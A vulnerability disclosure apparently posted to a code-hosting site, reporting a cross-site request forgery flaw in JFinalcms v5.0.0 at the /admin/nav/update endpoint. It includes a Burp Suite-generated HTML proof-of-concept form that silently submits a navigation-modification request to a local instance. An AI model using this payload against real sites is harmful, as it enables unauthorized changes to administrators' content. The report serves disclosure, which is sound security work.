Skip to content

Latest commit

 

History

History
39 lines (27 loc) · 1.19 KB

CSRF exists at the navigation management modification location.md

File metadata and controls

39 lines (27 loc) · 1.19 KB
Raw

target:https://gitee.com/heyewei/JFinalcms

version:v5.0.0

JFinalcms v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/nav/update

图片

create poc

图片

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8888/admin/nav/update" method="POST">
      <input type="hidden" name="id" value="96" />
      <input type="hidden" name="name" value="cs&#32;123" />
      <input type="hidden" name="parentId" value="" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="url" value="" />
      <input type="hidden" name="isOutlink" value="0" />
      <input type="hidden" name="sort" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

successed

图片